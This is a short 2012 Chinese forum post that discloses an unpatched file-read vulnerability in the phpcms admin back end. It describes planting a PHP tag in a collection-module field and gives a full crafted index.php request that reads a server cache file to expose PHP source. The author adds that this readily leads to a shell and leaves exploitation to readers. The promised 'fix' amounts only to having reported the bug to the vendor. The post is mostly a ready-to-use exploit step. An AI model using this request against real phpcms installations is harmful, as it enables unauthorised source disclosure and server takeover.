云凌 發表於 2012-8-17 16:52:15

phpcms后台普通用户读文件0day的分析以及修复方法

后台采集里设置采集模块中title 或者其他的内容都可以 设置为&lt;?php[内容]?&gt; <br />然后用下面的代码就可以读取到php的源了。 <br />index.php?clientid=name&amp;url=./caches/caches_scan/caches_data/scan_bad_file.cache.php&amp;_=1344175735957&amp;m=collection&amp;c=node&amp;a=public_test_content&amp;nodeid=1&amp;pc_hash=xxxx <br />拿到源基本拿到shell不难了。具体如何利用看大家自己了。(别跟我说只会读数据库连接文件,并且还不能连),反正我是可以拿到shell。 <br />修复:已提交给官方,等待补丁 <br />
頁: [1]
查看完整版本: phpcms后台普通用户读文件0day的分析以及修复方法